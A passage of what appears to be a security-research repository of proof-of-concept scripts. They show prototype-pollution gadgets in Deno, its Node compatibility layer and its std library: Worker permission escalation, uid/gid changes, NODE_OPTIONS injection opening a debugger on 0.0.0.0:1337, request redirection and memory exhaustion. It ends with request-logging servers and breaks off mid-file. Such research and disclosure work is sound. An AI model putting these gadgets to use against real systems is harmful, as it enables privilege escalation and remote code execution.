-------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("uid", 42); 6 | const process = Deno.run({ cmd: ["id"] }); 7 | console.log(process); 8 | -------------------------------------------------------------------------------- /deno/Deno/writeFile/writeFile.append.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await 
file.write(data); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | await Deno.writeFile(`./${name}`, data); 15 | 16 | const file = await Deno.open(`./${name}`, { read: true, append: false }); 17 | const buffer = new Uint8Array(16); 18 | const count = await file.read(buffer); 19 | const text = new TextDecoder().decode(buffer); 20 | console.log(name, "contains", text, `(${count} bytes)`); 21 | file.close(); 22 | 23 | Deno.remove(`./${name}`); 24 | } 25 | 26 | await create("unpolluted"); 27 | await create("polluted"); 28 | 29 | await writeThenRead("unpolluted"); 30 | pollute("append", true); 31 | await writeThenRead("polluted"); 32 | -------------------------------------------------------------------------------- /deno/Deno/writeFile/writeFile.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(data); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | await Deno.writeFile(`./${name}`, data); 15 | 16 | const fileInfo = await Deno.stat(`./${name}`); 17 | console.log(name, "mode:", fileInfo.mode); 18 | 19 | Deno.remove(`./${name}`); 20 | } 21 | 22 | await create("unpolluted-exists"); 23 | await create("polluted-exists"); 24 | 25 | await writeThenRead("unpolluted-new"); 26 | await writeThenRead("unpolluted-exists"); 27 | pollute("mode", 0o777); 28 | await writeThenRead("polluted-new"); 29 | await writeThenRead("polluted-exists"); 30 | -------------------------------------------------------------------------------- /deno/Deno/writeFile/writeFileSync.append.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: 
string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(data); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | Deno.writeFileSync(`./${name}`, data); 15 | 16 | const file = await Deno.open(`./${name}`, { read: true, append: false }); 17 | const buffer = new Uint8Array(16); 18 | const count = await file.read(buffer); 19 | const text = new TextDecoder().decode(buffer); 20 | console.log(name, "contains", text, `(${count} bytes)`); 21 | file.close(); 22 | 23 | Deno.remove(`./${name}`); 24 | } 25 | 26 | await create("unpolluted"); 27 | await create("polluted"); 28 | 29 | await writeThenRead("unpolluted"); 30 | pollute("append", true); 31 | await writeThenRead("polluted"); 32 | -------------------------------------------------------------------------------- /deno/Deno/writeFile/writeFileSync.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(data); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | Deno.writeFileSync(`./${name}`, data); 15 | 16 | const fileInfo = await Deno.stat(`./${name}`); 17 | console.log(name, "mode:", fileInfo.mode); 18 | 19 | Deno.remove(`./${name}`); 20 | } 21 | 22 | await create("unpolluted-exists"); 23 | await create("polluted-exists"); 24 | 25 | await writeThenRead("unpolluted-new"); 26 | await writeThenRead("unpolluted-exists"); 27 | pollute("mode", 0o777); 28 | await writeThenRead("polluted-new"); 29 | await 
writeThenRead("polluted-exists"); 30 | -------------------------------------------------------------------------------- /deno/Deno/writeTextFile/writeTextFile.append.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = "foobar"; 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(new TextEncoder().encode(data)); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | await Deno.writeTextFile(`./${name}`, data); 15 | 16 | const file = await Deno.open(`./${name}`, { read: true, append: false }); 17 | const buffer = new Uint8Array(16); 18 | const count = await file.read(buffer); 19 | const text = new TextDecoder().decode(buffer); 20 | console.log(name, "contains", text, `(${count} bytes)`); 21 | file.close(); 22 | 23 | Deno.remove(`./${name}`); 24 | } 25 | 26 | await create("unpolluted"); 27 | await create("polluted"); 28 | 29 | await writeThenRead("unpolluted"); 30 | pollute("append", true); 31 | await writeThenRead("polluted"); 32 | -------------------------------------------------------------------------------- /deno/Deno/writeTextFile/writeTextFile.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = "foobar"; 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(new TextEncoder().encode(data)); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | await Deno.writeTextFile(`./${name}`, data); 15 | 16 | const fileInfo = await Deno.stat(`./${name}`); 17 | console.log(name, "mode:", fileInfo.mode); 18 | 19 | 
Deno.remove(`./${name}`); 20 | } 21 | 22 | await create("unpolluted-exists"); 23 | await create("polluted-exists"); 24 | 25 | await writeThenRead("unpolluted-new"); 26 | await writeThenRead("unpolluted-exists"); 27 | pollute("mode", 0o777); 28 | await writeThenRead("polluted-new"); 29 | await writeThenRead("polluted-exists"); 30 | -------------------------------------------------------------------------------- /deno/Deno/writeTextFile/writeTextFileSync.append.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = "foobar"; 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(new TextEncoder().encode(data)); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | Deno.writeTextFile(`./${name}`, data); 15 | 16 | const file = await Deno.open(`./${name}`, { read: true, append: false }); 17 | const buffer = new Uint8Array(16); 18 | const count = await file.read(buffer); 19 | const text = new TextDecoder().decode(buffer); 20 | console.log(name, "contains", text, `(${count} bytes)`); 21 | file.close(); 22 | 23 | Deno.remove(`./${name}`); 24 | } 25 | 26 | await create("unpolluted"); 27 | await create("polluted"); 28 | 29 | await writeThenRead("unpolluted"); 30 | pollute("append", true); 31 | await writeThenRead("polluted"); 32 | -------------------------------------------------------------------------------- /deno/Deno/writeTextFile/writeTextFileSync.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = "foobar"; 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true 
}); 9 | await file.write(new TextEncoder().encode(data)); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | Deno.writeTextFileSync(`./${name}`, data); 15 | 16 | const fileInfo = await Deno.stat(`./${name}`); 17 | console.log(name, "mode:", fileInfo.mode); 18 | 19 | Deno.remove(`./${name}`); 20 | } 21 | 22 | await create("unpolluted-exists"); 23 | await create("polluted-exists"); 24 | 25 | await writeThenRead("unpolluted-new"); 26 | await writeThenRead("unpolluted-exists"); 27 | pollute("mode", 0o777); 28 | await writeThenRead("polluted-new"); 29 | await writeThenRead("polluted-exists"); 30 | -------------------------------------------------------------------------------- /deno/Worker/.gitignore: -------------------------------------------------------------------------------- 1 | worker.ts 2 | -------------------------------------------------------------------------------- /deno/Worker/Worker.env.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'env' }));" + 5 | "console.log('DENO_INSTALL_ROOT:', Deno.env.get('DENO_INSTALL_ROOT'));" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | 11 | // PoC 12 | function pollute(key: string, value: any) { 13 | ((((Object as any).prototype as any)[key]) as any) = value; 14 | } 15 | 16 | pollute("env", true); 17 | new Worker( 18 | import.meta.resolve("./worker.ts"), 19 | { type: "module", deno: { permissions: {/*some object*/} } }, 20 | ); 21 | -------------------------------------------------------------------------------- /deno/Worker/Worker.ffi.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'ffi' }));" + 5 | "Deno.exit(1);", 6 | { create: true }, 7 
| ); 8 | 9 | 10 | // PoC 11 | function pollute(key: string, value: any) { 12 | ((((Object as any).prototype as any)[key]) as any) = value; 13 | } 14 | 15 | pollute("ffi", true); 16 | new Worker( 17 | import.meta.resolve("./worker.ts"), 18 | { type: "module", deno: { permissions: {/*some object*/} } }, 19 | ); 20 | -------------------------------------------------------------------------------- /deno/Worker/Worker.hrtime.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'hrtime' }));" + 5 | "console.log('start time:', performance.mark('start').startTime);" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | 11 | // PoC 12 | function pollute(key: string, value: any) { 13 | ((((Object as any).prototype as any)[key]) as any) = value; 14 | } 15 | 16 | pollute("hrtime", true); 17 | new Worker( 18 | import.meta.resolve("./worker.ts"), 19 | { type: "module", deno: { permissions: {/*some object*/} } }, 20 | ); 21 | -------------------------------------------------------------------------------- /deno/Worker/Worker.net.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'net' }));" + 5 | "console.log(await fetch('https://deno.com/'));" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | // PoC 11 | function pollute(key: string, value: any) { 12 | ((((Object as any).prototype as any)[key]) as any) = value; 13 | } 14 | 15 | pollute("net", true); 16 | new Worker( 17 | import.meta.resolve("./worker.ts"), 18 | { type: "module", deno: { permissions: {/*some object*/} } }, 19 | ); 20 | -------------------------------------------------------------------------------- /deno/Worker/Worker.read.PoC.ts: 
-------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'read' }));" + 5 | "console.log('Worker code:', Deno.readTextFileSync('./worker.ts'));" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | 11 | // PoC 12 | function pollute(key: string, value: any) { 13 | ((((Object as any).prototype as any)[key]) as any) = value; 14 | } 15 | 16 | pollute("read", true); 17 | new Worker( 18 | import.meta.resolve("./worker.ts"), 19 | { type: "module", deno: { permissions: {/*some object*/} } }, 20 | ); 21 | -------------------------------------------------------------------------------- /deno/Worker/Worker.run.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'run' }));" + 5 | "(new Deno.Command('ls')).spawn();" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | 11 | // PoC 12 | function pollute(key: string, value: any) { 13 | ((((Object as any).prototype as any)[key]) as any) = value; 14 | } 15 | 16 | pollute("run", true); 17 | new Worker( 18 | import.meta.resolve("./worker.ts"), 19 | { type: "module", deno: { permissions: {/*some object*/} } }, 20 | ); 21 | -------------------------------------------------------------------------------- /deno/Worker/Worker.sys.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'sys' }));" + 5 | "console.log(Deno.osRelease());" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | // PoC 11 | function pollute(key: string, value: any) { 12 | ((((Object as any).prototype as any)[key]) as any) = value; 13 | } 14 | 15 | 
pollute("sys", true); 16 | new Worker( 17 | import.meta.resolve("./worker.ts"), 18 | { type: "module", deno: { permissions: {/*some object*/} } }, 19 | ); 20 | -------------------------------------------------------------------------------- /deno/Worker/Worker.write.PoC.ts: -------------------------------------------------------------------------------- 1 | // Create worker on the fly 2 | Deno.writeTextFileSync( 3 | "./worker.ts", 4 | "console.log(await Deno.permissions.query({ name: 'write' }));" + 5 | "Deno.writeTextFileSync('./worker.ts', 'foobar');" + 6 | "Deno.exit(1);", 7 | { create: true }, 8 | ); 9 | 10 | 11 | // PoC 12 | function pollute(key: string, value: any) { 13 | ((((Object as any).prototype as any)[key]) as any) = value; 14 | } 15 | 16 | pollute("write", true); 17 | new Worker( 18 | import.meta.resolve("./worker.ts"), 19 | { type: "module", deno: { permissions: {/*some object*/} } }, 20 | ); 21 | setTimeout(() => console.log(Deno.readTextFileSync('./worker.ts')), 500); 22 | -------------------------------------------------------------------------------- /deno/fetch/fetch.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("0", "https://github.com"); 6 | pollute("method", "POST"); 7 | pollute("body", "Hello world!"); 8 | pollute("headers", { 9 | "foo": "bar", 10 | "content-type": "plaintext", 11 | }); 12 | 13 | const response = await fetch("https://deno.land/"); 14 | console.log(response); 15 | -------------------------------------------------------------------------------- /deno/node/child_process/exec.env.PoC.ts: -------------------------------------------------------------------------------- 1 | import { exec } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | 
pollute("shell", "node"); 8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" }); 9 | 10 | const process = exec("echo 'Hello world!'"); 11 | process.stdout.on("data", (data) => console.log(data.toString())); 12 | -------------------------------------------------------------------------------- /deno/node/child_process/execFileSync.env.PoC.ts: -------------------------------------------------------------------------------- 1 | import { execFileSync } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("shell", "node"); 8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" }); 9 | 10 | const process = execFileSync("echo", ["Hello", "world!"]); 11 | console.log(process.toString()); 12 | -------------------------------------------------------------------------------- /deno/node/child_process/execSync.env.PoC.ts: -------------------------------------------------------------------------------- 1 | import { execSync } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("shell", "node"); 8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" }); 9 | 10 | const process = execSync("echo 'Hello world!'"); 11 | console.log(process.toString()); 12 | -------------------------------------------------------------------------------- /deno/node/child_process/spawn.env.PoC.ts: -------------------------------------------------------------------------------- 1 | import { spawn } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("shell", "node"); 8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" }); 9 | 10 | const process = spawn("echo", ["Hello", "world!"]); 11 | process.stdout.on("data", (data) => 
console.log(data.toString())); 12 | -------------------------------------------------------------------------------- /deno/node/child_process/spawn.gid.PoC.ts: -------------------------------------------------------------------------------- 1 | import { spawn } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("gid", 42); 8 | 9 | const process = spawn("id"); 10 | process.stdout.on("data", (data) => console.log(data.toString())); 11 | -------------------------------------------------------------------------------- /deno/node/child_process/spawn.uid.PoC.ts: -------------------------------------------------------------------------------- 1 | import { spawn } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("uid", 42); 8 | 9 | const process = spawn("id"); 10 | process.stdout.on("data", (data) => console.log(data.toString())); 11 | -------------------------------------------------------------------------------- /deno/node/child_process/spawnSync.env.PoC.ts: -------------------------------------------------------------------------------- 1 | import { spawnSync } from "node:child_process"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("shell", "node"); 8 | pollute("env", { NODE_OPTIONS: "--inspect-brk=0.0.0.0:1337" }); 9 | 10 | const process = spawnSync("echo", ["Hello", "world!"]); 11 | console.log(process.stdout.toString()); 12 | -------------------------------------------------------------------------------- /deno/node/fs/appendFile.length.PoC.ts: -------------------------------------------------------------------------------- 1 | import { appendFile } from "node:fs"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype 
as any)[key]) as any) = value; 5 | } 6 | 7 | const data = "foobar"; 8 | 9 | // NOTE: must be larger than the length of what is being written 10 | pollute("length", data.length + 1); 11 | 12 | appendFile("./file", data, () => {}); 13 | -------------------------------------------------------------------------------- /deno/node/fs/appendFile.offset.PoC.ts: -------------------------------------------------------------------------------- 1 | import { appendFile } from "node:fs"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | // NOTE: must be large to consume a lot of memory 8 | pollute("offset", 0xFFFFFFFF); 9 | 10 | appendFile("./file", "foobar", () => { }); 11 | -------------------------------------------------------------------------------- /deno/node/fs/writeFile.length.PoC.ts: -------------------------------------------------------------------------------- 1 | import { writeFile } from "node:fs"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | const data = "foobar"; 8 | 9 | // NOTE: must be larger than the length of what is being written 10 | pollute("length", data.length + 1); 11 | 12 | writeFile("./file", data, () => {}); 13 | -------------------------------------------------------------------------------- /deno/node/fs/writeFile.offset.PoC.ts: -------------------------------------------------------------------------------- 1 | import { writeFile } from "node:fs"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | // NOTE: must be large to consume a lot of memory 8 | pollute("offset", 0xFFFFFFFF); 9 | 10 | writeFile("./file", "foobar", () => {}); 11 | -------------------------------------------------------------------------------- /deno/node/http/request.hostname.PoC.ts: 
-------------------------------------------------------------------------------- 1 | import http from "node:http"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("hostname", "example.com"); 8 | pollute("port", "80"); 9 | pollute("method", "POST"); 10 | pollute("path", "/"); 11 | 12 | http.request( 13 | { host: "deno.land" }, 14 | (res) => { 15 | res.setEncoding("utf8"); 16 | res.on("data", console.log); 17 | }, 18 | ).end(); 19 | -------------------------------------------------------------------------------- /deno/node/https/request.hostname.PoC.ts: -------------------------------------------------------------------------------- 1 | import https from "node:https"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("hostname", "example.com"); 8 | pollute("port", "443"); 9 | pollute("method", "POST"); 10 | pollute("path", "/"); 11 | 12 | https.request( 13 | { host: "deno.land" }, 14 | (res) => { 15 | res.setEncoding("utf8"); 16 | res.on("data", console.log); 17 | }, 18 | ).end(); 19 | -------------------------------------------------------------------------------- /deno/node/zlib/createBrotliCompress.params.PoC.ts: -------------------------------------------------------------------------------- 1 | import { createBrotliCompress } from "node:zlib"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("params", "any string"); 8 | 9 | createBrotliCompress(); 10 | -------------------------------------------------------------------------------- /deno/std/dotenv/.env: -------------------------------------------------------------------------------- 1 | foo=bar 2 | -------------------------------------------------------------------------------- /deno/std/dotenv/.env.default: 
-------------------------------------------------------------------------------- 1 | hello=world! 2 | -------------------------------------------------------------------------------- /deno/std/dotenv/.env.other: -------------------------------------------------------------------------------- 1 | foo=baz 2 | -------------------------------------------------------------------------------- /deno/std/dotenv/load.any.PoC.ts: -------------------------------------------------------------------------------- 1 | import { load } from "https://deno.land/std@0.204.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | await load({ export: true }); 8 | console.log(Deno.env.get("foo")); 9 | console.log(Deno.env.get("hello")); 10 | 11 | pollute("hello", "world"); 12 | 13 | await load({ export: true }); 14 | console.log(Deno.env.get("foo")); 15 | console.log(Deno.env.get("hello")); 16 | -------------------------------------------------------------------------------- /deno/std/dotenv/load.defaultsPath.PoC.ts: -------------------------------------------------------------------------------- 1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | const unpolluted = await load(); 8 | console.log(unpolluted); 9 | 10 | pollute("defaultsPath", "./.env.default"); 11 | 12 | const polluted = await load(); 13 | console.log(polluted); 14 | -------------------------------------------------------------------------------- /deno/std/dotenv/load.envPath.PoC.ts: -------------------------------------------------------------------------------- 1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | const unpolluted = await 
load(); 8 | console.log(unpolluted); 9 | 10 | pollute("envPath", "./.env.other"); 11 | 12 | const polluted = await load(); 13 | console.log(polluted); 14 | -------------------------------------------------------------------------------- /deno/std/dotenv/load.export.PoC.ts: -------------------------------------------------------------------------------- 1 | import { load } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | await load(); 8 | console.log(Deno.env.get("foo")); 9 | 10 | pollute("export", true); 11 | 12 | await load(); 13 | console.log(Deno.env.get("foo")); 14 | -------------------------------------------------------------------------------- /deno/std/dotenv/loadSync.any.PoC.ts: -------------------------------------------------------------------------------- 1 | import { loadSync } from "https://deno.land/std@0.204.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | loadSync({export: true}); 8 | console.log(Deno.env.get("foo")); 9 | console.log(Deno.env.get("hello")); 10 | 11 | pollute("hello", "world"); 12 | 13 | loadSync({export: true}); 14 | console.log(Deno.env.get("foo")); 15 | console.log(Deno.env.get("hello")); 16 | -------------------------------------------------------------------------------- /deno/std/dotenv/loadSync.defaultsPath.PoC.ts: -------------------------------------------------------------------------------- 1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | const unpolluted = loadSync(); 8 | console.log(unpolluted); 9 | 10 | pollute("defaultsPath", "./.env.default"); 11 | 12 | const polluted = loadSync(); 13 | console.log(polluted); 14 | 
-------------------------------------------------------------------------------- /deno/std/dotenv/loadSync.envPath.PoC.ts: -------------------------------------------------------------------------------- 1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | const unpolluted = loadSync(); 8 | console.log(unpolluted); 9 | 10 | pollute("envPath", "./.env.other"); 11 | 12 | const polluted = loadSync(); 13 | console.log(polluted); 14 | -------------------------------------------------------------------------------- /deno/std/dotenv/loadSync.export.PoC.ts: -------------------------------------------------------------------------------- 1 | import { loadSync } from "https://deno.land/std@0.216.0/dotenv/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | loadSync(); 8 | console.log(Deno.env.get("foo")); 9 | 10 | pollute("export", true); 11 | 12 | loadSync(); 13 | console.log(Deno.env.get("foo")); 14 | -------------------------------------------------------------------------------- /deno/std/json/JsonStringifyStream.prefix.PoC.ts: -------------------------------------------------------------------------------- 1 | import { JsonStringifyStream } from "https://deno.land/std@0.216.0/json/json_stringify_stream.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("prefix", '{"hello":"world!"}//'); 8 | 9 | const stream = ReadableStream.from([{ foo: "bar" }]); 10 | for await (const data of stream.pipeThrough(new JsonStringifyStream())) { 11 | console.log(data); 12 | } 13 | -------------------------------------------------------------------------------- /deno/std/json/JsonStringifyStream.suffix.PoC.ts: 
-------------------------------------------------------------------------------- 1 | import { JsonStringifyStream } from "https://deno.land/std@0.216.0/json/json_stringify_stream.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("suffix", '\r{"hello":"world!"}'); 8 | 9 | const stream = ReadableStream.from([{ foo: "bar" }]); 10 | for await (const data of stream.pipeThrough(new JsonStringifyStream())) { 11 | console.log(data); 12 | } 13 | -------------------------------------------------------------------------------- /deno/std/log/FileHandler.formatter.PoC.ts: -------------------------------------------------------------------------------- 1 | import * as log from "https://deno.land/std@0.213.0/log/mod.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | pollute("formatter", "Hello world!"); 8 | 9 | const fileHandler = new log.FileHandler("DEBUG", { filename: "./example.log" }); 10 | fileHandler.setup(); 11 | fileHandler.handle( 12 | new log.LogRecord({ 13 | msg: "foobar", 14 | args: [], 15 | level: log.LogLevels.DEBUG, 16 | }), 17 | ); 18 | -------------------------------------------------------------------------------- /deno/std/tar/Tar.gid.PoC.ts: -------------------------------------------------------------------------------- 1 | import { Tar } from "https://deno.land/std@0.204.0/archive/tar.ts"; 2 | import { Untar } from "https://deno.land/std@0.204.0/archive/untar.ts"; 3 | import { Buffer } from "https://deno.land/std@0.204.0/io/mod.ts"; 4 | 5 | function pollute(key: string, value: any) { 6 | ((((Object as any).prototype as any)[key]) as any) = value; 7 | } 8 | 9 | const content = new TextEncoder().encode("Hello world!"); 10 | 11 | pollute("gid", 42); 12 | 13 | const tar = new Tar(); 14 | await tar.append("output.txt", { 15 | reader: new Buffer(content), 16 | contentSize: 
content.byteLength, 17 | }); 18 | const untar = new Untar(tar.getReader()); 19 | const result = await untar.extract(); 20 | console.log("gid is", result.gid); 21 | -------------------------------------------------------------------------------- /deno/std/tar/Tar.uid.PoC.ts: -------------------------------------------------------------------------------- 1 | import { Tar } from "https://deno.land/std@0.204.0/archive/tar.ts"; 2 | import { Untar } from "https://deno.land/std@0.204.0/archive/untar.ts"; 3 | import { Buffer } from "https://deno.land/std@0.204.0/io/mod.ts"; 4 | 5 | function pollute(key: string, value: any) { 6 | ((((Object as any).prototype as any)[key]) as any) = value; 7 | } 8 | 9 | const content = new TextEncoder().encode("Hello world!"); 10 | 11 | pollute("uid", 42); 12 | 13 | const tar = new Tar(); 14 | await tar.append("output.txt", { 15 | reader: new Buffer(content), 16 | contentSize: content.byteLength, 17 | }); 18 | const untar = new Untar(tar.getReader()); 19 | const result = await untar.extract(); 20 | console.log("uid is", result.uid); 21 | -------------------------------------------------------------------------------- /deno/std/yaml/stringify.indent.PoC.ts: -------------------------------------------------------------------------------- 1 | import { stringify } from "https://deno.land/std@0.216.0/yaml/stringify.ts"; 2 | 3 | function pollute(key: string, value: any) { 4 | ((((Object as any).prototype as any)[key]) as any) = value; 5 | } 6 | 7 | // NOTE: must be large to consume a lot of memory 8 | pollute("indent", 0xFFFFFFFF); 9 | 10 | stringify({ obj: { foo: "bar" } }); 11 | -------------------------------------------------------------------------------- /http-server.js: -------------------------------------------------------------------------------- 1 | const http = require('http'); 2 | 3 | const server = http.createServer((req, res) => { 4 | console.log('Received request:'); 5 | console.log('Method:', req.method); 6 | console.log('URL:', 
req.url); 7 | console.log('Headers:', req.headers); 8 | 9 | // Collecting request body data 10 | let body = []; 11 | req.on('data', chunk => { 12 | body.push(chunk); 13 | }).on('end', () => { 14 | body = Buffer.concat(body).toString(); 15 | console.log('Body:', body); 16 | console.log('=========================================================='); 17 | 18 | // Sending response 19 | res.writeHead(200, {'Content-Type': 'text/plain'}); 20 | res.end('Request received and logged.'); 21 | }); 22 | }); 23 | 24 | server.listen(3000, () => { 25 | console.log('Server running on port 3000'); 26 | }); 27 | -------------------------------------------------------------------------------- /https-server.js: -------------------------------------------------------------------------------- 1 | const https = require('https'); 2 | const fs = require('fs'); 3 | 4 | const options = { 5 | key: fs.readFileSync('key.pem'), 6 | cert: fs.readFileSync('cert.pem') 7 | }; 8 | 9 | https.createServer(options, (req, res) => { 10 | console.log('Received request:'); 11 | console.log('Method:', req.method); 12 | console.log('URL:', req.url); 13 | console.log('Headers:', req.headers); 14 | 15 | // Collecting request body data 16 | let body = []; 17 | req.on('data', chunk => { 18 | body.push(chunk); 19 | }).on('end', () => { 20 | body = Buffer.concat(body).toString(); 21 | console.log('Body:', body); 22 | 